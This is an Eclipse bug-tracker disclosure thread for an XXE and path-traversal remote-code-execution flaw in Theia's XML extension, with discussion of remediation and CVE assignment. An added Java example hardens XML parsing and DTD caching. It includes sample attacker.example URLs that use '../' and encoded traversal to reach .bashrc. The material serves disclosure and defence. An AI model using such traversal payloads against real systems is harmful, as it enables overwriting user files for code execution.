
Bug 563174 (CVE-2021-34436)

Summary: Eclipse Theia XXE and RCE
Product: Community
Reporter: Wayne Beaton <wayne.beaton>
Component: Vulnerability Reports
Assignee: Security vulnerabilities reported against Eclipse projects <vulnerability.reports-inbox>
Status: RESOLVED FIXED
Severity: normal
Priority: P3
CC: anton, david, marc.dumais, sven.efftinge, wayne.beaton
Version: unspecified
Target Milestone: ---
Hardware: PC
OS: Linux

Description Wayne Beaton CLA 2020-05-14 11:45:49 EDT
From the Security Team Inbox:

--
It is possible to exploit the default Eclipse Theia build to obtain remote code execution (and XXE) via the theia-xml-extension. This extension uses lsp4xml (recently renamed to LemMinX) in order to provide language support for XML. This is installed by default. 

If it is run on an input file that references an external DTD, it will retrieve the external DTD file from the internet. This allows us to complete an XXE attack. But, far more interestingly, it has a built-in caching mechanism where it caches downloaded DTD files in `~/.lsp4xml/cache/`. Via path traversal characters (`../`) it is possible to request a DTD file and have it placed outside of the cache directory. From here, code execution can be achieved by using this primitive to write malicious files to the user's home directory.

Interestingly, it looks like this attack was already discovered and fixed in lsp4xml, but Theia has not updated the included JAR in 2 years. The simple fix for the RCE is just updating the included JAR.

Fixing the XXE is slightly more involved. It looks like VSCode had this issue and they fixed it by defaulting to not allowing external entities. I think a similar fix would likely be appropriate here. 

Please let me know if I can be of any assistance with fixing either of these bugs. I've gotten a pretty good hang of the code bases from researching them, so I'm happy to help draft patches if that's helpful. 
--
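As an added illustration of the two mitigations the report calls for, here is a small Java sketch that is not code from the report, from Theia or from lsp4xml/LemMinX. It shows (a) a DOM parser configured so that a DOCTYPE pointing at a remote DTD is never fetched, with an entity resolver as a second line of defence, and (b) a cache-path function that maps a DTD URL under a cache root and rejects any result that normalises to a location outside that root. The class name, the sample document, the attacker URLs and the host-plus-path cache layout are all constructed for this example; only the `~/.lsp4xml/cache/` directory name comes from the report.

```java
import java.io.IOException;
import java.io.StringReader;
import java.net.URI;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class XmlHardeningDemo {

    // Constructed sample input (not from the report): a document whose DOCTYPE
    // points at a remote DTD with traversal segments in its path. A parser that
    // loads external DTDs would fetch it, and a cache that derives a file name
    // from the URL path without a containment check would write outside the
    // cache directory.
    static final String SAMPLE =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE note SYSTEM \"http://attacker.example/../../.bashrc\">\n" +
        "<note>hello</note>\n";

    /** Entity resolver that never touches the network: any http/https/ftp
     *  system id is replaced by an empty entity. Other ids (e.g. file:)
     *  fall through to the parser's default handling. */
    static final EntityResolver NO_REMOTE = (publicId, systemId) -> {
        if (systemId != null) {
            String s = systemId.toLowerCase(Locale.ROOT);
            if (s.startsWith("http:") || s.startsWith("https:") || s.startsWith("ftp:")) {
                return new InputSource(new StringReader(""));
            }
        }
        return null;
    };

    /** Parse with external DTD/entity loading switched off at the factory
     *  (so the DOCTYPE above is skipped entirely), plus the resolver as a
     *  backstop in case a different factory configuration re-enables it. */
    static Document parseWithoutExternalEntities(String xml)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        DocumentBuilder b = f.newDocumentBuilder();
        b.setEntityResolver(NO_REMOTE);
        return b.parse(new InputSource(new StringReader(xml)));
    }

    /** Map a DTD URL to <cacheRoot>/<host>/<path>, refusing any result that
     *  escapes cacheRoot after normalisation. URI.getPath() is percent-decoded,
     *  so "%2e%2e" segments are caught the same way as literal "..". */
    static Path cachePathFor(Path cacheRoot, String url) {
        URI uri = URI.create(url);
        String host = uri.getHost();
        String path = uri.getPath();
        if (host == null || path == null || path.length() < 2) {
            throw new IllegalArgumentException("unsupported DTD URL: " + url);
        }
        Path root = cacheRoot.toAbsolutePath().normalize();
        Path candidate = root.resolve(host).resolve(path.substring(1)).normalize();
        if (!candidate.startsWith(root)) {
            throw new IllegalArgumentException("traversal outside cache rejected: " + url);
        }
        return candidate;
    }

    public static void main(String[] args) throws Exception {
        Document doc = parseWithoutExternalEntities(SAMPLE);
        System.out.println("parsed root element: " + doc.getDocumentElement().getTagName()
            + " (no network access attempted)");

        Path cache = Paths.get(System.getProperty("user.home"), ".lsp4xml", "cache");
        String[] urls = {
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd",
            "http://attacker.example/../../.bashrc",
            "http://attacker.example/%2e%2e/%2e%2e/.bashrc",
        };
        for (String u : urls) {
            try {
                System.out.println("OK       " + u + " -> " + cachePathFor(cache, u));
            } catch (IllegalArgumentException e) {
                System.out.println("REJECTED " + e.getMessage());
            }
        }
    }
}
```

The containment check is the part that matters for the RCE half of the report: it is done on the normalised absolute path, after decoding, and compares against the normalised root, so an attacker cannot get a different answer by mixing `..`, encoded dots or a longer prefix that merely starts with the same string. Disabling `load-external-dtd` at the factory is what removes the XXE half; the resolver only exists so that a later change to the factory settings does not silently reintroduce network fetches.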
Comment 1 David Dworken CLA 2020-05-21 22:44:01 EDT
Hi All,

I just wanted to check in to see if you have decided on a path forward for fixing this. If not, I'm happy to take the lead on patching it. In my opinion all that is necessary is:

1. Requesting a CVE number for this
2. PRing the theia-ide/theia-xml-extension to update the JAR to the latest version (https://github.com/theia-ide/theia-xml-extension/blob/master/xml/lsp4xml/org.eclipse.lsp4xml-all.jar) 
3. Publicly announce the fix somehow (potentially just updating the repository is sufficient)

If you would like, I'm happy to request a CVE and prepare a PR myself. 

Thanks,
David
Comment 2 Marc Dumais CLA 2020-05-22 10:42:02 EDT
Hi David,

Thanks for the report and offer to help. 

This may be a bit of a special situation: this extension, along with all Theia extensions that provide language support using Language Server Protocol (LSP), are more-or-less deprecated, since the language client is going to be removed, ETA next month. Instead Theia will rely on filling this functionality through VS Code extensions.

So it may not be necessary to actually fix this vulnerability - reporting it may well be enough.

I wanted to mention as well that this extension is not that popular - practically speaking it looks like no one is pulling it from npm (zero weekly download vs ~20k for our main extensions):

https://www.npmjs.com/package/@theia/xml

https://www.npmjs.com/package/@theia/core

So taking all this into consideration, what are the opinions about how to proceed?

Thanks,

Marc
Comment 3 Marc Dumais CLA 2020-05-22 10:50:04 EDT
Additionally, I have just tried to add @theia/xml to both the stable (latest) and nightly (next) version of a Theia example application, and it results in non-starting/working applications. Most likely the extension would need to be updated to work with recent Theia releases. 

This I think further limits the practical applicability of this vulnerability, since the extension is not usable currently with recent Theia. I do not know how far we'd need to go back in Theia version before the extension works, but it could be quite a bit.
Comment 4 David Dworken CLA 2020-06-09 12:46:51 EDT
Sorry for the late reply, I just realized that I wasn't getting notifications about this ticket. 

I think that makes sense about the impact of this being significantly limited which is great news to hear. Given that, I'm certainly fine with waiting a month for the code to be removed rather than working on a patch for this. Once the code has been removed, would you be okay with including in the patch notes a note about this bug? Just to ensure that if anyone is using it (and maybe has their own cached version from npm or anything else) they know to update.
Comment 5 Marc Dumais CLA 2020-06-09 18:56:52 EDT
Hi David,

I think your suggestion is reasonable. 

Anton, I think you will be the one working on removing Theia's base language client? Can you take a note to mention this vulnerability in CHANGELOG? I am thinking we could provide a list of our @theia extensions that are made obsolete by this change, and we could also mention this exploit for @theia/xml. 

Wayne, WDYT? Ok with you?
Comment 6 Wayne Beaton CLA 2020-06-10 20:51:41 EDT
> Wayne, WDYT? Ok with you?

I defer to your judgement.

If you're going to mention the vulnerability in the CHANGELOG, it sounds like a CVE may be in order.

https://www.eclipse.org/projects/handbook/#vulnerability-cve
Comment 7 Anton Kosyakov CLA 2020-06-11 01:45:20 EDT
> Anton, I think you will be the one working on removing Theia's base language client? Can you take a note to mention this vulnerability in CHANGELOG? I am thinking we could provide a list of our @theia extensions that are made obsolete by this change, and we could also mention this exploit for @theia/xml. 

Hi Marc, I'm not sure why we need this note. As far as I understand the issue is not in Theia framework code, but in a 3rd-party extension which is not used in practice and can be deleted already.
Comment 8 Marc Dumais CLA 2020-06-11 10:04:38 EDT
(In reply to Anton Kosyakov from comment #7)
> > Anton, I think you will be the one working on removing Theia's base language 
> Hi Marc, I'm not sure why we need this note. As far as I understand the
> issue is not in Theia framework code, but in 3rd party extension which is
> not used in practice and can be deleted already.

Hi Anton,

Do you mean we could delete the versions of @theia/xml published on npm, and I guess the repo too, since it's already useless (does not work with recent Theia)? Given that Theia extensions published on npm "rot" quite fast, it does seem to me this could be enough.
Comment 9 Marc Dumais CLA 2020-06-11 10:15:22 EDT
> the issue is not in Theia framework code, but in 3rd party extension

That's correct, but it's still an extension community members made/maintained and it was published in the @theia namespace, so it looks like an official extension if one does not know better. 

I agree about it not being practically used though.
Comment 10 Anton Kosyakov CLA 2020-06-12 02:01:34 EDT
Hi Marc,

> Do you mean we could delete the versions of @theia/xml published on npm, and I guess the repo too, since it's already useless (does not work with recent Theia)?

Yes, adopters should use https://marketplace.visualstudio.com/items?itemName=redhat.vscode-xml instead. There is no need to wait till we deprecate language support via Theia extensions.
Comment 11 Anton Kosyakov CLA 2020-06-12 02:03:01 EDT
Should have pointed to Open VSX Registry instead of MS one: https://open-vsx.org/extension/redhat/vscode-xml :)
Comment 12 David Dworken CLA 2020-06-15 20:56:51 EDT
I just want to chime in and say that since it is under the `theia` Github organization, as an end user it does seem to me that it is an official part of Theia (and there isn't any disclaimer in the readme).
Comment 13 Marc Dumais CLA 2020-06-15 23:52:35 EDT
Anton - I agree, there is no need to wait to deal with that repo. 

David - would you be willing to provide the text, that Wayne will need to register the CVE? I think maybe the "director's cut" version of your initial report, in the description above, would work?
Comment 14 David Dworken CLA 2020-06-16 21:03:22 EDT
Sure, how does the below description look? 

An XXE could be exploited against the theia-xml-extension in order to obtain remote code execution and local file disclosure if Theia was used to view a malicious XML file. This vulnerability came from depending on an out of date version of lsp4xml (recently renamed to LemMinX).
Comment 15 Wayne Beaton CLA 2021-08-16 16:02:51 EDT
Housekeeping. We've exceeded our three month disclosure deadline, so I've removed the confidential flag.

(In reply to David Dworken from comment #14)
> Sure, how does the below description look? 
> 
> An XXE could be exploited against the theia-xml-extension in order to obtain
> remote code execution and local file disclosure if Theia was used to view a
> malicious XML file. This vulnerability came from depending on an out of date
> version of lsp4xml (recently renamed to LemMinX).

Give me a version range and a CWE [1] and I'll create the CVE.

[1] https://cwe.mitre.org/
Comment 16 Marc Dumais CLA 2021-08-30 17:33:41 EDT
(In reply to Wayne Beaton from comment #15)
> 
> Give me a version range and a CWE [1] and I'll create the CVE.
> 
> [1] https://cwe.mitre.org/


Thanks Wayne. 

Here are all versions published (obtained from cmd "yarn info @theia/xml"): 
versions: [
    '0.1.1',
    '0.1.2',
    '0.2.0-next.28bc2735',
    '0.2.0-next.41406d98',
    '0.2.0-next.a2958907'
  ]

Can the range contain wildcards? If so it could be something like:
0.1.1 - 0.2.0*

CWEs:
XXE: CWE-611
path traversal: CWE-22
Comment 17 Wayne Beaton CLA 2021-09-02 16:51:06 EDT
I've assigned CVE-2021-34436